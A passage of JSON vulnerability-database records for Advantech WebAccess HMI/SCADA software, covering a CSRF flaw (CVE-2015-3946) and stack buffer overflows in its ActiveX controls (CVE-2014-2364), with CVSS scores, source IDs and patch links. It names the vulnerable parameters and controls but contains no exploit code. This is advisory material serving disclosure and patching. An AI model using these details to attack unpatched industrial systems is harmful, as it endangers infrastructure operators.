"db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "CNNVD", "id": "CNNVD-201601-320" }, { "db": "NVD", "id": "CVE-2015-3946" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site request forgery (CSRF) vulnerability in Advantech WebAccess before 8.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. Advantech WebAccess Contains a cross-site request forgery vulnerability.Authentication may be hijacked by a third party. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. A remote attacker could exploit this vulnerability to perform unauthorized operations", "sources": [ { "db": "NVD", "id": "CVE-2015-3946" }, { "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-81907" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3946", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-320", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00426", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006782", "trust": 0.8 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64F288BE-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-81907", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "VULHUB", "id": "VHN-81907" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "CNNVD", "id": "CNNVD-201601-320" }, { "db": "NVD", "id": "CVE-2015-3946" } ] }, "id": "VAR-201601-0640", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "VULHUB", "id": "VHN-81907" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00426" } ] }, "last_update_date": "2024-11-23T21:43:23.627000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Cross-Site Request Forgery Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70371" }, { "title": "Advantech WebAccess Fixes for cross-site request forgery vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59638" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "CNNVD", "id": "CNNVD-201601-320" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-81907" }, { "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "NVD", "id": "CVE-2015-3946" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3946" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3946" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "VULHUB", "id": "VHN-81907" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "CNNVD", "id": "CNNVD-201601-320" }, { "db": "NVD", "id": "CVE-2015-3946" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "VULHUB", "id": "VHN-81907" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "db": "CNNVD", "id": "CNNVD-201601-320" }, { "db": "NVD", "id": "CVE-2015-3946" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00426" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-81907" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-320" }, { "date": "2016-01-15T03:59:01.433000", "db": "NVD", "id": "CVE-2015-3946" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00426" }, { "date": "2016-01-18T00:00:00", "db": "VULHUB", "id": "VHN-81907" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006782" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-320" }, { "date": "2024-11-21T02:30:07.120000", "db": "NVD", "id": "CVE-2015-3946" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-320" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Cross-Site Request Forgery Vulnerability", "sources": [ { "db": "IVD", "id": "64f288be-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00426" }, { "db": "CNNVD", "id": "CNNVD-201601-320" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-320" } ], "trust": 0.6 } }
var-201407-0233
Vulnerability from variot
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 7.0, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1" }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-244" }, { "db": "ZDI", "id": "ZDI-14-252" }, { "db": "ZDI", "id": "ZDI-14-255" }, { "db": "ZDI", "id": "ZDI-14-241" }, { "db": "ZDI", "id": "ZDI-14-246" }, { "db": "ZDI", "id": "ZDI-14-243" }, { "db": "ZDI", "id": "ZDI-14-253" }, { "db": "ZDI", "id": "ZDI-14-242" }, { "db": "ZDI", "id": "ZDI-14-256" }, { "db": "ZDI", "id": "ZDI-14-254" }, { "db": "CNVD", "id": "CNVD-2014-04544" }, { "db": "JVNDB", "id": "JVNDB-2014-003487" }, { "db": "CNNVD", "id": "CNNVD-201407-476" }, { "db": "NVD", "id": "CVE-2014-2364" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003487" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-14-252" }, { "db": "ZDI", "id": "ZDI-14-255" }, { "db": "ZDI", "id": "ZDI-14-246" }, { "db": "ZDI", "id": "ZDI-14-253" }, { "db": "ZDI", "id": "ZDI-14-256" }, { "db": "ZDI", "id": "ZDI-14-254" } ], "trust": 4.2 }, "cve": "CVE-2014-2364", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-2364", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 8.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-04544", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e485769a-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-70303", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "CVE-2014-2364", "trust": 7.0, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2014-2364", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-2364", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2014-04544", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201407-476", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-70303", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1" }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-244" }, { "db": "ZDI", "id": "ZDI-14-252" }, { "db": "ZDI", "id": "ZDI-14-255" }, { "db": "ZDI", "id": "ZDI-14-241" }, { "db": "ZDI", "id": "ZDI-14-246" }, { "db": "ZDI", "id": "ZDI-14-243" }, { "db": "ZDI", "id": "ZDI-14-253" }, { "db": "ZDI", "id": "ZDI-14-242" }, { "db": "ZDI", "id": "ZDI-14-256" }, { "db": "ZDI", "id": "ZDI-14-254" }, { "db": "CNVD", "id": "CNVD-2014-04544" }, { "db": "VULHUB", "id": "VHN-70303" }, { "db": "JVNDB", "id": "JVNDB-2014-003487" }, { "db": "CNNVD", "id": "CNNVD-201407-476" }, { "db": "NVD", "id": "CVE-2014-2364" } ] }, "description": { "_id": null, "data": "Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2014-2364" }, { "db": "JVNDB", "id": "JVNDB-2014-003487" }, { "db": "ZDI", "id": "ZDI-14-243" }, { "db": "ZDI", "id": "ZDI-14-254" }, { "db": "ZDI", "id": "ZDI-14-256" }, { "db": "ZDI", "id": "ZDI-14-242" }, { "db": "ZDI", "id": "ZDI-14-253" }, { "db": "ZDI", "id": "ZDI-14-246" }, { "db": "ZDI", "id": "ZDI-14-241" }, { "db": "ZDI", "id": "ZDI-14-255" }, { "db": "ZDI", "id": "ZDI-14-252" }, { "db": "ZDI", "id": "ZDI-14-244" }, { "db": "CNVD", "id": "CNVD-2014-04544" }, { "db": "BID", "id": "68714" }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-70303" } ], "trust": 9.18 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-70303", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-70303" } ] }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-2364", "trust": 10.8 }, { "db": "ICS CERT", "id": "ICSA-14-198-02", "trust": 3.1 }, { "db": "BID", "id": "68714", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201407-476", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "128384", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-04544", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-003487", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2045", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-244", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2062", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-252", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2066", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-255", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2032", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-241", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2065", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-246", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2044", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-243", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2063", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-253", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2043", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-242", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2067", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-256", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2064", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-254", "trust": 0.7 }, { "db": "IVD", "id": "7D7F00B0-463F-11E9-B5C5-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "E485769A-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "EXPLOIT-DB", "id": "34757", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-70303", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1" }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-244" }, { "db": "ZDI", "id": "ZDI-14-252" }, { "db": "ZDI", "id": "ZDI-14-255" }, { "db": "ZDI", "id": "ZDI-14-241" }, { "db": "ZDI", "id": "ZDI-14-246" }, { "db": "ZDI", "id": "ZDI-14-243" }, { "db": "ZDI", "id": "ZDI-14-253" }, { "db": "ZDI", "id": "ZDI-14-242" }, { "db": "ZDI", "id": "ZDI-14-256" }, { "db": "ZDI", "id": "ZDI-14-254" }, { "db": "CNVD", "id": "CNVD-2014-04544" }, { "db": "VULHUB", "id": "VHN-70303" }, { "db": "BID", "id": "68714" }, { "db": "JVNDB", "id": "JVNDB-2014-003487" }, { "db": "CNNVD", "id": "CNNVD-201407-476" }, { "db": "NVD", "id": "CVE-2014-2364" } ] }, "id": "VAR-201407-0233", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1" }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04544" }, { "db": "VULHUB", "id": "VHN-70303" } ], "trust": 1.53470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1" }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04544" } ] }, "last_update_date": "2024-11-29T22:56:23.397000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 7.0, "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02" }, { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://webaccess.advantech.com/" }, { "title": "Advantech WebAccess patch for multiple ActiveX control buffer overflow vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/47828" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-244" }, { "db": "ZDI", "id": "ZDI-14-252" }, { "db": "ZDI", "id": "ZDI-14-255" }, { "db": "ZDI", "id": "ZDI-14-241" }, { "db": "ZDI", "id": "ZDI-14-246" }, { "db": "ZDI", "id": "ZDI-14-243" }, { "db": "ZDI", "id": "ZDI-14-253" }, { "db": "ZDI", "id": "ZDI-14-242" }, { "db": "ZDI", "id": "ZDI-14-256" }, { "db": "ZDI", "id": "ZDI-14-254" }, { "db": "CNVD", "id": "CNVD-2014-04544" }, { "db": "JVNDB", "id": "JVNDB-2014-003487" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-70303" }, { "db": "JVNDB", "id": "JVNDB-2014-003487" }, { "db": "NVD", "id": "CVE-2014-2364" } ] }, "references": { "_id": null, "data": [ { "trust": 10.1, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-02" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/68714" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/128384/advantech-webaccess-dvs.ocx-getcolor-buffer-overflow.html" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2364" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2364" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-244" }, { "db": "ZDI", "id": "ZDI-14-252" }, { "db": "ZDI", "id": "ZDI-14-255" }, { "db": "ZDI", "id": "ZDI-14-241" }, { "db": "ZDI", "id": "ZDI-14-246" }, { "db": "ZDI", "id": "ZDI-14-243" }, { "db": "ZDI", "id": "ZDI-14-253" }, { "db": "ZDI", "id": "ZDI-14-242" }, { "db": "ZDI", "id": "ZDI-14-256" }, { "db": "ZDI", "id": "ZDI-14-254" }, { "db": "CNVD", "id": "CNVD-2014-04544" }, { "db": "VULHUB", "id": "VHN-70303" }, { "db": "JVNDB", "id": "JVNDB-2014-003487" }, { "db": "CNNVD", "id": "CNNVD-201407-476" }, { "db": "NVD", "id": "CVE-2014-2364" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1", "ident": null }, { "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-244", "ident": null }, { "db": "ZDI", "id": "ZDI-14-252", "ident": null }, { "db": "ZDI", "id": "ZDI-14-255", "ident": null }, { "db": "ZDI", "id": "ZDI-14-241", "ident": null }, { "db": "ZDI", "id": "ZDI-14-246", "ident": null }, { "db": "ZDI", "id": "ZDI-14-243", "ident": null }, { "db": "ZDI", "id": "ZDI-14-253", "ident": null }, { "db": "ZDI", "id": "ZDI-14-242", "ident": null }, { "db": "ZDI", "id": "ZDI-14-256", "ident": null }, { "db": "ZDI", "id": "ZDI-14-254", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-04544", "ident": null }, { "db": "VULHUB", "id": "VHN-70303", "ident": null }, { "db": "BID", "id": "68714", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-003487", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201407-476", "ident": null }, { "db": "NVD", "id": "CVE-2014-2364", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "7d7f00b0-463f-11e9-b5c5-000c29342cb1", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "e485769a-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-244", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-252", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-255", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-241", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-246", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-243", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-253", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-242", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-256", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-254", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04544", "ident": null }, { "date": "2014-07-19T00:00:00", "db": "VULHUB", "id": "VHN-70303", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "BID", "id": "68714", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003487", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-476", "ident": null }, { "date": "2014-07-19T05:09:27.563000", "db": "NVD", "id": "CVE-2014-2364", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-244", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-252", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": 